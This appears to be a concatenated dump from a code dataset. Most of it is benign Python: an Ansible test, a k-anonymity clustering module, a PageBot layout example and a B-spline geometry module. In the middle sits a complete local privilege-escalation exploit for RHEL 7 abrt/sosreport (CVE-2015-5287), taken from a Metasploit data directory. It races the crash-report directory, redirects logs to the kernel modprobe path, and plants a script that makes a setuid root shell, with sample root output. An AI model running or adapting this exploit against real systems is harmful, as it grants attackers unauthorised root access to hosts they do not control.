"""
DEPLOYMENT_GROUP = dict(
name="OSS",
uri="/rest/deployment-group/d1c7b09a-6c7b-4ae0-b68e-ed208ccde1b0")
def test_get_all_deployment_groups(self):
self.resource.get_all.return_value = [self.DEPLOYMENT_GROUP]
self.mock_ansible_module.params = self.EXAMPLES[0]['image_streamer_deployment_group_facts']
DeploymentGroupFactsModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
ansible_facts=dict(deployment_groups=[self.DEPLOYMENT_GROUP])
)
def test_get_a_deployment_group_by_name(self):
self.resource.get_by.return_value = [self.DEPLOYMENT_GROUP]
self.mock_ansible_module.params = self.EXAMPLES[4]['image_streamer_deployment_group_facts']
DeploymentGroupFactsModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
ansible_facts=dict(deployment_groups=[self.DEPLOYMENT_GROUP])
)
if __name__ == '__main__':
pytest.main([__file__])
| 1.898438 | 2 |
clustering_based/clustering_based_k_anon.py | fhstp/k-Anonymity | 4 | 12770010 | # -*- coding: utf-8 -*-
"""
main module for cluster_based_k_anon
"""
import operator
import random
import time
from functools import cmp_to_key
from basic_mondrian.models.numrange import NumRange
from basic_mondrian.utils.utility import (cmp_str, get_num_list_from_str,
qid_to_key)
__DEBUG = False
# att_tree store root node for each att
ATT_TREES = []
# databack store all record for dataset
LEN_DATA = 0
QI_LEN = 0
QI_RANGE = []
IS_CAT = []
# get_LCA, gen_result and NCP require huge running time, while most of the function are duplicate
# we can use cache to reduce the running time
LCA_CACHE = []
NCP_CACHE = {}
class Cluster(object):
"""Cluster is for cluster based k-anonymity
self.member: record list in cluster
self.gen_result: generlized value for one cluster
"""
def __init__(self, member, gen_result, information_loss=0.0):
self.information_loss = information_loss
self.member = member
self.gen_result = gen_result[:]
self.center = gen_result[:]
for i in range(QI_LEN):
if IS_CAT[i] is False:
self.center[i] = str(sum([float(t[i]) for t in self.member]) * 1.0 / len(self.member))
def add_record(self, record):
"""
add record to cluster
"""
self.member.append(record)
self.update_gen_result(record, record)
def update_cluster(self):
"""update cluster information when member is changed
"""
self.gen_result = cluster_generalization(self.member)
for i in range(QI_LEN):
if IS_CAT[i]:
self.center[i] = self.gen_result[i]
else:
self.center[i] = str(sum([float(t[i]) for t in self.member]) * 1.0 / len(self.member))
self.information_loss = len(self.member) * NCP(self.gen_result)
def update_gen_result(self, merge_gen_result, center, num=1):
"""
update gen_result and information_loss after adding record or merging cluster
:param merge_gen_result:
:return:
"""
self.gen_result = generalization(self.gen_result, merge_gen_result)
current_len = len(self.member)
for i in range(QI_LEN):
if IS_CAT[i]:
self.center[i] = self.gen_result[i]
else:
self.center[i] = str((float(self.center[i]) * (current_len - num) +
float(center[i]) * num) / current_len)
self.information_loss = len(self.member) * NCP(self.gen_result)
def add_same_record(self, record):
"""
add record with same qid to cluster
"""
self.member.append(record)
def merge_cluster(self, cluster):
"""merge cluster into self and do not delete cluster elements.
update self.gen_result
"""
self.member.extend(cluster.member)
self.update_gen_result(cluster.gen_result, cluster.center, len(cluster))
def __getitem__(self, item):
"""
:param item: index number
:return: gen_result[item]
"""
return self.gen_result[item]
def __len__(self):
"""
return number of records in cluster
"""
return len(self.member)
def __str__(self):
return str(self.gen_result)
def r_distance(source, target):
"""
Return distance between source (cluster or record)
and target (cluster or record). The distance is based on
NCP (Normalized Certainty Penalty) on relational part.
If source or target are cluster, func need to multiply
source_len (or target_len).
"""
source_gen = source
target_gen = target
source_len = 1
target_len = 1
# check if target is Cluster
if isinstance(target, Cluster):
target_gen = target.gen_result
target_len = len(target)
# check if souce is Cluster
if isinstance(source, Cluster):
source_gen = source.gen_result
source_len = len(source)
if source_gen == target_gen:
return 0
gen = generalization(source_gen, target_gen)
# len should be taken into account
distance = (source_len + target_len) * NCP(gen)
return distance
def diff_distance(record, cluster):
"""
Return IL(cluster and record) - IL(cluster).
"""
gen_after = generalization(record, cluster.gen_result)
return NCP(gen_after) * (len(cluster) + 1) - cluster.information_loss
def NCP(record):
"""Compute NCP (Normalized Certainty Penalty)
when generate record to gen_result.
"""
ncp = 0.0
# exclude SA values(last one type [])
list_key = qid_to_key(record)
try:
return NCP_CACHE[list_key]
except KeyError:
pass
for i in range(QI_LEN):
# if leaf_num of numerator is 1, then NCP is 0
width = 0.0
if IS_CAT[i] is False:
try:
float(record[i])
except ValueError:
temp = record[i].split(',')
width = float(temp[1]) - float(temp[0])
else:
width = len(ATT_TREES[i][record[i]]) * 1.0
width /= QI_RANGE[i]
ncp += width
NCP_CACHE[list_key] = ncp
return ncp
def get_LCA(index, item1, item2):
"""Get lowest commmon ancestor (including themselves)"""
# get parent list from
if item1 == item2:
return item1
try:
return LCA_CACHE[index][item1 + item2]
except KeyError:
pass
parent1 = ATT_TREES[index][item1].parent[:]
parent2 = ATT_TREES[index][item2].parent[:]
parent1.insert(0, ATT_TREES[index][item1])
parent2.insert(0, ATT_TREES[index][item2])
min_len = min(len(parent1), len(parent2))
last_LCA = parent1[-1]
# note here: when trying to access list reversely, take care of -0
for i in range(1, min_len + 1):
if parent1[-i].value == parent2[-i].value:
last_LCA = parent1[-i]
else:
break
LCA_CACHE[index][item1 + item2] = last_LCA.value
return last_LCA.value
def generalization(record1, record2):
"""
Compute relational generalization result of record1 and record2
"""
gen = []
for i in range(QI_LEN):
if IS_CAT[i] is False:
split_number = []
split_number.extend(get_num_list_from_str(record1[i]))
split_number.extend(get_num_list_from_str(record2[i]))
split_number = list(set(split_number))
if len(split_number) == 1:
gen.append(split_number[0])
else:
split_number.sort(key=cmp_to_key(cmp_str))
gen.append(split_number[0] + ',' + split_number[-1])
else:
gen.append(get_LCA(i, record1[i], record2[i]))
return gen
def cluster_generalization(records):
"""
calculat gen_result of records(list) recursively.
Compute both relational gen_result for records (list).
"""
len_r = len(records)
gen = records[0]
for i in range(1, len_r):
gen = generalization(gen, records[i])
return gen
def find_best_knn(index, k, data):
"""key fuction of KNN. Find k nearest neighbors of record, remove them from data"""
dist_dict = {}
record = data[index]
# add random seed to cluster
for i, t in enumerate(data):
if i == index:
continue
dist = r_distance(record, t)
dist_dict[i] = dist
sorted_dict = sorted(dist_dict.items(), key=operator.itemgetter(1))
knn = sorted_dict[:k - 1]
knn.append((index, 0))
record_index = [t[0] for t in knn]
elements = [data[t[0]] for t in knn]
gen = cluster_generalization(elements)
cluster = Cluster(elements, gen, k * NCP(gen))
# delete multiple elements from data according to knn index list
return cluster, record_index
def find_best_cluster_iloss(record, clusters):
"""residual assignment. Find best cluster for record."""
min_distance = 1000000000000
min_index = 0
best_cluster = clusters[0]
for i, t in enumerate(clusters):
distance = r_distance(record, t.gen_result)
if distance < min_distance:
min_distance = distance
min_index = i
best_cluster = t
# add record to best cluster
return min_index
def find_best_cluster_iloss_increase(record, clusters):
"""residual assignment. Find best cluster for record."""
min_diff = 1000000000000
min_index = 0
best_cluster = clusters[0]
for i, t in enumerate(clusters):
IF_diff = diff_distance(record, t)
if IF_diff < min_diff:
min_distance = IF_diff
min_index = i
best_cluster = t
# add record to best cluster
return min_index
def find_furthest_record(record, data):
"""
:param record: the latest record be added to cluster
:param data: remain records in data
:return: the index of the furthest record from r_index
"""
max_distance = 0
max_index = -1
for index in range(len(data)):
current_distance = r_distance(record, data[index])
if current_distance >= max_distance:
max_distance = current_distance
max_index = index
return max_index
def find_best_record_iloss_increase(cluster, data):
"""
:param cluster: current
:param data: remain dataset
:return: index of record with min diff on information loss
"""
min_diff = 1000000000000
min_index = 0
for index, record in enumerate(data):
# IL(cluster and record) and |cluster| + 1 is a constant
# so IL(record, cluster.gen_result) is enough
IF_diff = diff_distance(record, cluster)
if IF_diff < min_diff:
min_diff = IF_diff
min_index = index
return min_index
def clustering_knn(data, k=25):
"""
Group record according to QID distance. KNN
"""
clusters = []
# randomly choose seed and find k-1 nearest records to form cluster with size k
while len(data) >= k:
index = random.randrange(len(data))
cluster, record_index = find_best_knn(index, k, data)
data = [t for i, t in enumerate(data[:]) if i not in set(record_index)]
clusters.append(cluster)
# residual assignment
while len(data) > 0:
t = data.pop()
cluster_index = find_best_cluster_iloss(t, clusters)
clusters[cluster_index].add_record(t)
return clusters
def clustering_kmember(data, k=25):
"""
Group record according to NCP. K-member
"""
clusters = []
# randomly choose seed and find k-1 nearest records to form cluster with size k
r_pos = random.randrange(len(data))
r_i = data[r_pos]
while len(data) >= k:
r_pos = find_furthest_record(r_i, data)
r_i = data.pop(r_pos)
cluster = Cluster([r_i], r_i)
while len(cluster) < k:
r_pos = find_best_record_iloss_increase(cluster, data)
r_j = data.pop(r_pos)
cluster.add_record(r_j)
clusters.append(cluster)
# residual assignment
while len(data) > 0:
t = data.pop()
cluster_index = find_best_cluster_iloss_increase(t, clusters)
clusters[cluster_index].add_record(t)
return clusters
def adjust_cluster(cluster, residual, k):
center = cluster.center
dist_dict = {}
# add random seed to cluster
for i, t in enumerate(cluster.member):
dist = r_distance(center, t)
dist_dict[i] = dist
sorted_dict = sorted(dist_dict.iteritems(), key=operator.itemgetter(1))
need_adjust_index = [t[0] for t in sorted_dict[k:]]
need_adjust = [cluster.member[t] for t in need_adjust_index]
residual.extend(need_adjust)
# update cluster
cluster.member = [t for i, t in enumerate(cluster.member)
if i not in set(need_adjust_index)]
cluster.update_cluster()
def clustering_oka(data, k=25):
"""
Group record according to NCP. OKA: one time pass k-means
"""
clusters = []
can_clusters = []
less_clusters = []
# randomly choose seed and find k-1 nearest records to form cluster with size k
seed_index = random.sample(range(len(data)), len(data) / k)
for index in seed_index:
record = data[index]
can_clusters.append(Cluster([record], record))
data = [t for i, t in enumerate(data[:]) if i not in set(seed_index)]
while len(data) > 0:
record = data.pop()
index = find_best_cluster_iloss(record, can_clusters)
can_clusters[index].add_record(record)
residual = []
for cluster in can_clusters:
if len(cluster) < k:
less_clusters.append(cluster)
else:
if len(cluster) > k:
adjust_cluster(cluster, residual, k)
clusters.append(cluster)
while len(residual) > 0:
record = residual.pop()
if len(less_clusters) > 0:
index = find_best_cluster_iloss(record, less_clusters)
less_clusters[index].add_record(record)
if less_clusters[index] >= k:
clusters.append(less_clusters.pop(index))
else:
index = find_best_cluster_iloss(record, clusters)
clusters[index].add_record(record)
return clusters
def init(att_trees, data, SA_num, QI_num=-1):
"""
init global variables
"""
global ATT_TREES, DATA_BACKUP, LEN_DATA, QI_RANGE, IS_CAT, QI_LEN, LCA_CACHE, NCP_CACHE, SA_INDEX
SA_INDEX = SA_num
ATT_TREES = att_trees
QI_RANGE = []
IS_CAT = []
LEN_DATA = len(data)
LCA_CACHE = []
NCP_CACHE = {}
if QI_num <= 0:
QI_LEN = len(data[0]) - 1
else:
QI_LEN = QI_num
for i in range(QI_LEN):
LCA_CACHE.append(dict())
if isinstance(ATT_TREES[i], NumRange):
IS_CAT.append(False)
QI_RANGE.append(ATT_TREES[i].range)
else:
IS_CAT.append(True)
QI_RANGE.append(len(ATT_TREES[i]['*']))
def clustering_based_k_anon(att_trees, data, k, QI_num, SA_num, type_alg):
"""
the main function of clustering based k-anon
"""
init(att_trees, data, SA_num, QI_num)
result = []
start_time = time.time()
if type_alg == 'knn':
print("Begin to KNN Cluster based on NCP")
clusters = clustering_knn(data, k)
elif type_alg == 'kmember':
print("Begin to K-Member Cluster based on NCP")
clusters = clustering_kmember(data, k)
elif type_alg == 'oka':
print("Begin to OKA Cluster based on NCP")
clusters = clustering_oka(data, k)
else:
print("Please choose merge algorithm types")
print("knn | kmember")
return (0, (0, 0))
rtime = float(time.time() - start_time)
ncp = 0.0
for cluster in clusters:
final_result = []
for i in range(len(cluster)):
# Custom! For non QI Values
tmp = []
for s in range(len(cluster.member[i]) - len(SA_INDEX), len(cluster.member[i])):
tmp += [cluster.member[i][s]]
final_result.append(cluster.gen_result + tmp)
result.extend(final_result)
ncp += cluster.information_loss
ncp /= LEN_DATA
ncp /= QI_LEN
ncp *= 100
if __DEBUG:
print("NCP=", ncp)
return (result, (ncp, rtime))
| 2.4375 | 2 |
test_apps/python_app/targets/dut/o1_dut0.py | Origen-SDK/o2 | 0 | 12770011 | <filename>test_apps/python_app/targets/dut/o1_dut0.py
origen.app.instantiate_dut("dut.o1_dut0")
| 1.257813 | 1 |
Basics/E07_Typography/E08_HeadlineAlignment.py | freder/PageBotExamples | 5 | 12770012 | <filename>Basics/E07_Typography/E08_HeadlineAlignment.py
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# -----------------------------------------------------------------------------
#
# P A G E B O T E X A M P L E S
#
# www.pagebot.io
# Licensed under MIT conditions
#
# -----------------------------------------------------------------------------
#
# E08_HeadlineAlignment.py
#
from pagebot import getContext
from pagebot.fonttoolbox.objects.font import findFont
from pagebot.toolbox.units import em, p, pt
from pagebot.constants import *
from pagebot.elements import *
from pagebot.conditions import *
from pagebot.document import Document
context = getContext('DrawBot')
W, H = pt(1500, 1000) # Document size
PADDING = pt(100) # Page padding on all sides
G = p(2) # 2 Pica gutter
PW = W - 2*PADDING # Usable padded page width
PH = H - 2*PADDING # Usable padded page height
CW = (PW - G)/3 # Column width
CH = PH
# Hard coded grid for 3 columns, will be automatic in later examples.
GRIDX = ((CW, G), (CW, G), (CW, G))
GRIDY = ((CH, 0),) # No division in vertical grid.
BASELINE = G
NUM_PAGES = 1
# Get the font object, from te Roboto file that is included in PageBot resources for testing.
f = findFont('PageBot-Regular')
# Make the style dictionary for the body text.
style = dict(font=f, fontSize=24, leading=em(1.4), textFill=0.3, hyphenation=LANGUAGE_EN)
# Create a new document with 1 page. Set overall size and padding.
doc = Document(w=W, h=H, padding=PADDING, gridX=GRIDX, gridY=GRIDY, context=context,
autoPages=NUM_PAGES, baselineGrid=BASELINE)
# Get the default page view of the document and set viewing parameters
view = doc.view
view.showTextOverflowMarker = True # Shows as [+] marker on bottom-right of page.
# TODO: Fix the Arrow-connection drawing
view.showFlowConnections = False # Draw arrows between elements of there is a flow.
view.showOrigin = True # Show position of elements as cross-hair
view.showGrid = [GRID_COL_BG, GRID_ROW_BG, GRID_SQR_BG] # Set types of grid lines to show for background
view.showBaselineGrid = True # Show default baseline grid of the column lines.
page = doc[1]
bs = context.newString('Headline Kphx', style=dict(font=f, fontSize=150, textFill=(1, 0, 0)))
e = newText(bs, x=100, y=300, parent=page,
conditions=[Fit2Width(), Shrink2TextHeight(), CapHeight2Top()])
print(sorted(e.baselines), e.parent.top, e.top, e.bottom, e.bs.size, context.b.textSize(e.bs.s))
page.solve()
print(sorted(e.baselines), e.parent.top, e.top, e.bottom, e.bs.size, context.b.textSize(e.bs.s))
print(e.textLines)
doc.export('_export/HeadlineAlignment.pdf')
| 2.765625 | 3 |
Lib/test/bugs/pr183.py | jimmyyu2004/jython | 332 | 12770013 | <gh_stars>100-1000
# Test case for PR#183; print of a recursive PyStringMap causes a JVM stack
# overflow.
g = globals()
print(g)
| 1.6875 | 2 |
api/services/__init__.py | adkl/etf_online_competition_system | 0 | 12770014 | <reponame>adkl/etf_online_competition_system<gh_stars>0
from .etf_oracle_service import EtfOracleService | 1.0625 | 1 |
data/exploits/cve-2015-5287/sosreport-rhel7.py | OsmanDere/metasploit-framework | 26,932 | 12770015 | <reponame>OsmanDere/metasploit-framework<filename>data/exploits/cve-2015-5287/sosreport-rhel7.py
#!/usr/bin/python
# CVE-2015-5287 (?)
# abrt/sosreport RHEL 7.0/7.1 local root
# rebel 09/2015
# [user@localhost ~]$ python sosreport-rhel7.py
# crashing pid 19143
# waiting for dump directory
# dump directory: /var/tmp/abrt/ccpp-2015-11-30-19:41:13-19143
# waiting for sosreport directory
# sosreport: sosreport-localhost.localdomain-20151130194114
# waiting for tmpfiles
# tmpfiles: ['tmpurfpyY', 'tmpYnCfnQ']
# moving directory
# moving tmpfiles
# tmpurfpyY -> tmpurfpyY.old
# tmpYnCfnQ -> tmpYnCfnQ.old
# waiting for sosreport to finish (can take several minutes)........................................done
# success
# bash-4.2# id
# uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
# bash-4.2# cat /etc/redhat-release
# Red Hat Enterprise Linux Server release 7.1 (Maipo)
import os,sys,glob,time,sys,socket
payload = "#!/bin/sh\ncp /bin/sh /tmp/sh\nchmod 6755 /tmp/sh\n"
pid = os.fork()
if pid == 0:
os.execl("/usr/bin/sleep","sleep","100")
time.sleep(0.5)
print "crashing pid %d" % pid
os.kill(pid,11)
print "waiting for dump directory"
def waitpath(p):
while 1:
r = glob.glob(p)
if len(r) > 0:
return r
time.sleep(0.05)
dumpdir = waitpath("/var/tmp/abrt/cc*%d" % pid)[0]
print "dump directory: ", dumpdir
os.chdir(dumpdir)
print "waiting for sosreport directory"
sosreport = waitpath("sosreport-*")[0]
print "sosreport: ", sosreport
print "waiting for tmpfiles"
tmpfiles = waitpath("tmp*")
print "tmpfiles: ", tmpfiles
print "moving directory"
os.rename(sosreport, sosreport + ".old")
os.mkdir(sosreport)
os.chmod(sosreport,0777)
os.mkdir(sosreport + "/sos_logs")
os.chmod(sosreport + "/sos_logs",0777)
os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/sos.log")
os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/ui.log")
print "moving tmpfiles"
for x in tmpfiles:
print "%s -> %s" % (x,x + ".old")
os.rename(x, x + ".old")
open(x, "w+").write("/tmp/hax.sh\n")
os.chmod(x,0666)
os.chdir("/")
sys.stderr.write("waiting for sosreport to finish (can take several minutes)..")
def trigger():
open("/tmp/hax.sh","w+").write(payload)
os.chmod("/tmp/hax.sh",0755)
try: socket.socket(socket.AF_INET,socket.SOCK_STREAM,132)
except: pass
time.sleep(0.5)
try:
os.stat("/tmp/sh")
except:
print "could not create suid"
sys.exit(-1)
print "success"
os.execl("/tmp/sh","sh","-p","-c",'''echo /sbin/modprobe > /proc/sys/kernel/modprobe;rm -f /tmp/sh;python -c "import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');"''')
sys.exit(-1)
for x in xrange(0,60*10):
if "/tmp/hax" in open("/proc/sys/kernel/modprobe").read():
print "done"
trigger()
time.sleep(1)
sys.stderr.write(".")
print "timed out" | 1.328125 | 1 |
sfepy/mesh/splinebox.py | clazaro/sfepy | 0 | 12770016 | <gh_stars>0
from __future__ import absolute_import
from __future__ import print_function
import numpy as nm
from .bspline import BSpline
from sfepy.base.base import Struct
from six.moves import range
class SplineBox(Struct):
"""
B-spline geometry parametrization. The geometry can be modified
by moving spline control points.
"""
@staticmethod
def gen_cp_idxs(ncp):
dim = len(ncp)
if dim == 2:
idxs = nm.mgrid[0:ncp[0], 0:ncp[1]]
elif dim == 3:
idxs = nm.mgrid[0:ncp[0], 0:ncp[1], 0:ncp[2]]
else:
raise(ValueError)
cp_idxs = []
mul_idx = [1]
for ii in range(dim - 1):
mul_idx.append(mul_idx[ii] * ncp[ii])
cp_idxs = []
for ii in range(dim):
cp_idxs.append(idxs[ii].reshape(nm.prod(ncp), order='F'))
return cp_idxs, nm.array(mul_idx)
@staticmethod
def create_spb(bbox, coors, degree=3, nsg=None):
nc, cdim = coors.shape
inside = nm.ones((nc,), dtype=nm.bool)
nsg = nm.ones((cdim,), dtype=nm.int) if nsg is None else nm.array(nsg)
for idim in range(cdim):
inrange = nm.logical_and(coors[:, idim] >= bbox[idim][0],
coors[:, idim] <= bbox[idim][1])
inside = nm.logical_and(inside, inrange)
ncp_tot = 1
base, uidx, ncp, cp = [], [], [], []
for idim in range(cdim):
ucoors, ucoors_idx = nm.unique(coors[inside, idim],
return_inverse=True)
ncp0 = degree + nsg[idim]
bspl = BSpline(degree, ncp=ncp0)
bspl.make_knot_vector(knot_range=(bbox[idim][0], bbox[idim][1]))
knots = bspl.get_knot_vector()
cp0 = nm.zeros((ncp0,), dtype=nm.double)
for j in range(cp0.shape[0]):
cp0[j] = nm.sum(knots[(j + 1):(j + degree + 1)]) / degree
base.append(bspl.eval_basis(t=ucoors, return_val=True))
uidx.append(ucoors_idx)
ncp.append(ncp0)
cp.append(cp0)
ncp_tot *= ncp0
print(knots)
print(cp0)
cp_coors = nm.zeros((ncp_tot, cdim), dtype=nm.double)
cp_idx, mul_cp_idx = SplineBox.gen_cp_idxs(ncp)
for ii in range(cdim):
cp_coors[:, ii] = cp[ii][cp_idx[ii]]
print(cp_coors)
return {'base': base,
'uidx': uidx,
'ncp': ncp,
'cp_idx': cp_idx,
'mul_cp_idx': mul_cp_idx,
'cp_coors': cp_coors,
'idxs_inside': inside}
def __init__(self, bbox, coors, nsg=None, field=None):
"""
Create a SplineBox.
Parameters
----------
bbox : array
The mesh bounding box.
coors : array
The coordinates of mesh nodes.
nsg : array
The number of segments.
"""
bbox = nm.asarray(bbox)
coors = nm.asarray(coors)
self.coors = coors.copy()
self.cdim = coors.shape[1]
if field is not None:
field = nm.asarray(field)
if len(field.shape) <= 1:
field = field[..., nm.newaxis]
self.field = field.copy()
else:
self.field = self.coors
self.__dict__.update(self.create_spb(bbox, coors, nsg=nsg))
if field is not None:
if hasattr(self, 'idxs_inside'):
b = field[self.idxs_inside, ...]
else:
b = field
a = self.get_box_matrix()
self.cp_values = nm.linalg.lstsq(a, b)[0]
else:
self.cp_values = self.cp_coors
self.cp_values0 = self.cp_values.copy()
def get_coors_shape(self):
"""
Get the shape of the coordinates.
"""
return self.coors.shape
def get_control_points(self, init=False):
"""
Get the spline control points coordinates.
Returns
-------
cpt_coors : array
The coordinates of the spline control points.
init : bool
If True, return the initial state.
"""
if init:
return self.cp_values0
else:
return self.cp_values
def set_control_points(self, cpt_coors, add=False):
"""
Set the spline control points position.
Parameters
----------
cpt_coors : array
The coordinates of the spline control points.
add : bool
If True, coors += cpt_coors
"""
if add:
self.cp_values += cpt_coors
else:
self.cp_values = cpt_coors
def move_control_point(self, cpoint, val):
"""
Change shape of spline parametrization.
Parameters
----------
cpoint : int, list
The position (index or grid indicies) of the spline control point.
val : array
Displacement.
"""
if type(cpoint) in [list, tuple, nm.ndarray]:
idx = nm.dot(nm.array(cpoint), self.mul_cp_idx)
else:
idx = cpoint
self.cp_values[idx, :] += val
def get_box_matrix(self):
"""
Returns:
mtx : 2D array
The matrix containing the coefficients of b-spline
basis functions.
"""
ncp, cdim = self.cp_coors.shape
mtx = nm.ones((self.uidx[0].shape[0], ncp), dtype=nm.double)
for ii in range(cdim):
mtx *= self.base[ii][self.uidx[ii], :][:, self.cp_idx[ii]]
return mtx
def evaluate(self, cp_values=None, outside=True):
"""
Evaluate the new position of the mesh coordinates.
Parameters
----------
cp_values : array
The actual control point values. If None, use self.control_values.
outside : bool
If True, return also the coordinates outside the spline box.
Returns
-------
new_coors : array
The new position of the mesh coordinates.
"""
if cp_values is None:
cp_values = self.cp_values
mtx = self.get_box_matrix()
if outside and hasattr(self, 'idxs_inside'):
field = self.field.copy()
field[self.idxs_inside, ...] = nm.dot(mtx, cp_values)
return field
else:
return nm.dot(mtx, cp_values)
def evaluate_derivative(self, cpoint, dirvec):
"""
Evaluate derivative of the spline
in a given control point and direction.
Parameters
----------
cpoint : int, list
The position (index or grid indicies) of the spline control point.
dirvec : array
The directional vector.
Returns
-------
diff : array
The derivative field.
"""
if type(cpoint) in [list, tuple, nm.ndarray]:
idxs = cpoint
else:
idxs = []
aux = cpoint
for ii in range(self.cdim):
idxs.append(aux // self.mul_cp_idx[-(ii + 1)])
aux = aux % self.mul_cp_idx[-(ii + 1)]
idxs = idxs[::-1]
aux = nm.ones((self.uidx[0].shape[0],), dtype=nm.double)
for ii in range(self.cdim):
aux *= self.base[ii][self.uidx[ii], idxs[ii]]
dirvec = nm.asarray(dirvec)
return nm.dot(aux[:, nm.newaxis],
nm.reshape(dirvec, (1, self.cp_values.shape[1])))
def write_control_net(self, filename):
"""
Write the SplineBox shape to the VTK file.
Parameters
----------
filename : str
The VTK file name.
"""
ncp = self.ncp
npt = nm.prod(ncp)
f = open(filename, 'w')
f.write("# vtk DataFile Version 2.6\nspbox file\n"
"ASCII\nDATASET UNSTRUCTURED_GRID\n\n")
f.write("POINTS %d float\n" % npt)
if self.cdim == 2:
ptformat = "%e %e 0.0\n"
elif self.cdim == 3:
ptformat = "%e %e %e\n"
for cpt in self.cp_coors:
f.write(ptformat % tuple(cpt))
cells = nm.array([nm.arange(0, ncp[0] - 1), nm.arange(1, ncp[0])]).T
cp = ncp[0]
nc = cp - 1
for ii in range(1, self.cdim):
cells1 = []
ncpi = ncp[ii]
for jj in range(ncpi):
cells1.append(cells + jj * cp)
nc = nc * ncpi
cells = nm.array([nm.arange(0, ncpi - 1),
nm.arange(1, ncpi)]).T * cp
for jj in range(cp):
cells1.append(cells + jj)
nc += (ncpi - 1) * cp
cells = nm.vstack(cells1)
cp *= ncp[ii]
f.write("\nCELLS %d %d\n" % (nc, 3 * nc))
for ii in cells:
f.write("2 %d %d\n" % tuple(ii))
f.write("\nCELL_TYPES %d\n" % nc)
f.write("3\n" * nc)
f.write("\nPOINT_DATA %d\n" % npt)
for ival in range(self.cp_values.shape[1]):
f.write("\nSCALARS cp_value_%d float 1\n" % (ival + 1))
f.write("LOOKUP_TABLE default\n")
f.write('\n'.join(self.cp_values[:, ival].astype('|S10')) + '\n')
f.close()
class SplineRegion2D(SplineBox):
"""
B-spline geometry parametrization. The boundary of the SplineRegion2D
is defined by BSpline curves.
"""
@staticmethod
def points_in_poly(points, poly, tol=1e-6):
"""
Find which points are located inside the polygon.
"""
poly = nm.array(poly)
points = nm.array(points)
inside = nm.zeros((points.shape[0],), dtype=nm.bool)
p1 = poly[:-1]
p2 = poly[1:]
a1 = (p2[:, 1] - p1[:, 1])
a1nz = nm.where(nm.fabs(a1) > 1e-16)[0]
a2 = (p2[a1nz, 0] - p1[a1nz, 0]) / a1[a1nz]
for jj, pt in enumerate(points):
# on edges?
if nm.any(nm.linalg.norm(p1 - pt, axis=1) +
nm.linalg.norm(p2 - pt, axis=1) -
nm.linalg.norm(p1 - p2, axis=1) < tol):
inside[jj] = True
continue
# inside?
val = nm.logical_and(
(p1[a1nz, 1] > pt[1]) != (p2[a1nz, 1] > pt[1]),
pt[0] < (a2*(pt[1] - p1[a1nz, 1]) + p1[a1nz, 0]))
if (nm.where(val)[0].shape[0] % 2) > 0:
inside[jj] = True
return nm.where(inside)[0]
@staticmethod
def define_control_points(cp_bnd_coors, ncp):
"""
Find positions of "inner" control points depending on boundary splines.
"""
nx, ny = ncp
grid = nm.zeros(ncp, dtype=nm.int32)
grid.T.flat = nm.arange(nx * ny)
coors = nm.zeros((nx * ny, 2), dtype=nm.float64)
idxs1 = nm.arange(nx)
idxs2 = nm.arange(1, ny - 1) * nx
bcnd = nm.hstack([idxs1, idxs2 + nx - 1,
idxs1[::-1] + nx * (ny - 1), idxs2[::-1]])
coors[bcnd, :] = cp_bnd_coors
for ii in range(1, nx - 1):
for jj, t in enumerate(nm.linspace(0, 1, ny)[1:-1]):
c = (1 - t) * coors[ii, :] + t * coors[ii + (ny - 1)*nx, :]
coors[ii + nx*(jj + 1), :] = c
inside = grid[1:-1, 1:-1].flatten()
for iiter in range(5):
for ii in inside:
dx = nm.array([0., 0.])
for jj in [-1, +1, -nx, + nx]:
dx -= 0.25 * (coors[ii, :] - coors[ii + jj, :])
coors[ii] += 0.1 * dx
return coors
@staticmethod
def create_spb(spl_bnd, coors, rho=10):
"""
Initialize SplineBox knots, control points, base functions, ...
"""
dim = 2
if coors.shape[1] != dim:
print('Only 2D SplineBoxSBnd is supported!')
raise(ValueError)
bnd_poly = []
bnd_cp = []
for s in spl_bnd:
s.set_param_n(rho)
bnd_poly.append(s.eval()[:-1])
bnd_cp.append(s.get_control_points()[:-1, :])
bnd_poly.append(bnd_poly[0][0, :])
ncpoints = 1
base, bspl, uidx, ncp = [], [], [], []
for idim, si in enumerate([0, 1]):
s = spl_bnd[si]
bspl0 = BSpline(s.degree, ncp=s.ncp)
bspl0.set_knot_vector(s.knots)
bspl.append(bspl0)
base.append(None)
uidx.append(None)
ncp.append(s.ncp)
ncpoints *= s.ncp
cp_idx, mul_cp_idx = SplineBox.gen_cp_idxs(ncp)
cp_coors = SplineRegion2D.define_control_points(nm.vstack(bnd_cp), ncp)
idxs_inside = SplineRegion2D.points_in_poly(coors, nm.vstack(bnd_poly))
return {'base': base,
'bspl': bspl,
'uidx': uidx,
'ncp': ncp,
'cp_idx': cp_idx,
'mul_cp_idx': mul_cp_idx,
'cp_coors': cp_coors,
'idxs_inside': idxs_inside}
def find_ts(self, coors):
"""
Function finds parameters (t, s) corresponding to given points (coors).
"""
from scipy.optimize import minimize
def ptdist(x, coors, spb):
for ii in range(spb.cdim):
spb.base[ii] = spb.bspl[ii].eval_basis(t=x[ii],
return_val=True)
coors_approx = spb.evaluate(outside=False)
return nm.linalg.norm(coors - coors_approx)
def gen_grid(spb, rho):
grid = nm.mgrid[0:rho, 0:rho]
t = nm.linspace(0, 1, rho)
for ii in range(spb.cdim):
spb.uidx[ii] = grid[ii, :].reshape(rho**self.cdim, order='F')
spb.base[ii] = spb.bspl[ii].eval_basis(t=t, return_val=True)
return spb.evaluate(outside=False)
rho = 100
grid = gen_grid(self, rho)
for ii in range(self.cdim):
self.uidx[ii] = nm.array([0])
ts = nm.zeros((coors.shape[0], self.cdim), dtype=nm.float64)
for ii, ic in enumerate(coors):
idx = nm.argmin(nm.linalg.norm(grid - ic, axis=1))
x0 = nm.array([idx % rho, idx // rho]) / (rho - 1.)
ts[ii] = minimize(lambda x: ptdist(x, ic, self), x0,
method='nelder-mead',
options={'xtol': 1e-5, 'disp': False}).x
return ts
def __init__(self, spl_bnd, coors, rho=1e3):
"""
Create a SplineBox which boundary is defined by B-spline curves.
Parameters
----------
spl_bnd : list
The list of BSpline objects (counterclockwise)
defining the SplineBox boundary.
coors : array
The coordinates of the mesh nodes.
